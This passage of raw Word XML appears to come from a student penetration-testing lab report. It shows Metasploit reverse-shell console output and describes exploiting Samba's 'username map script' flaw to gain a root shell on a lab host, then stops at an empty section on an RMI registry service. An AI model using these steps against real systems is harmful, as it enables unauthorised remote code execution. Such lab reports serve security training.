                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Accepted the second client connection...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC8B83D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Command: echo </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>ME48Ld69eG9iYOIG;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7550FFCE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Writing to socket A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F728795" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Writing to socket B</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27C841D0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Reading from sockets...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48918481" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Reading from socket B</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11952EB2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] B: "ME48Ld69eG9iYOIG\r\n"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="232D105F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Matching...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12D9DEB6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] A is input...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B41A98F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Command shell session 1 opened (192.168.1.96:4444 -&gt; 192.168.1.85:55728) at 2024-05-16 13:56:27 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="68ADA5DE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="342B16AD" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7411C489" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68C11747" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A6F2A2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B703A5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13C621" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability [Third]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA4BD1F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF845FF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Services: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>smbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.X - 4.X (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA22B84" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="476C45AA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Your result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB95504" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23FF2E28" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9A74C0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="009D4026" wp14:editId="2BB2A150">
            <wp:extent cx="6120130" cy="3338195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8"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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3338195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D906A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EE333AE" wp14:editId="6D4299B3">
            <wp:extent cx="6120130" cy="2983865"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Image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A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2983865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="731A01DB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F0F5772" wp14:editId="7A9A8E25">
            <wp:extent cx="6120130" cy="3290570"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Image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A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3290570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C6161C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154B0B36" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF9E4B0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9450" w:type="dxa"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2953"/>
        <w:gridCol w:w="6497"/>
      </w:tblGrid>
      <w:tr w:rsidR="00970F89" w14:paraId="278F05EC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="368"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5FC73E7A" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="79B4C8FA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Output (services, ports)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="27F87C17" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34E3062D" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">So, initially, I search the “Samba” and got the 26 modules. I started checking the excellent rank and Descriptions of that and noticed that one description of module </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">coincides with my description of the service based on CVE like: "username map script". Then, I used this module. After, I checked the options and again </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">the port was the same with my service and I </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>set the RHOSTS. I would like to notice that here we have payload with set LHOST, so I needed to just run this shell. Eventually, I got the results:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0470C537" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">“Command shell session 2 opened (192.168.1.96:4444 -&gt; 192.168.1.85:42453) at 2024-05-16 14:44:19 -0400” </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754A92CA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
              </w:rPr>
              <w:t>=0(root) gid=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48EE37FC" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.1.96:4444 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E687E6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>[*] Command shell session 2 opened (192.168.1.96:4444 -&gt; 192.168.1.85:42453) at 2024-05-16 14:44:19 -0400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="591A4B20" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="327"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2953" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02BD49D0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6496" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32C560AB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60C0F4A6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65765EF7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability [Fourth]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092621B2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E755BA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="western"/>
        <w:spacing w:before="280" w:after="0"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Services: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">GNU </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Classpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>grmiregistry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 1099</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D06C8E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE14EF7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Your result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379F293B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFD8B8E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
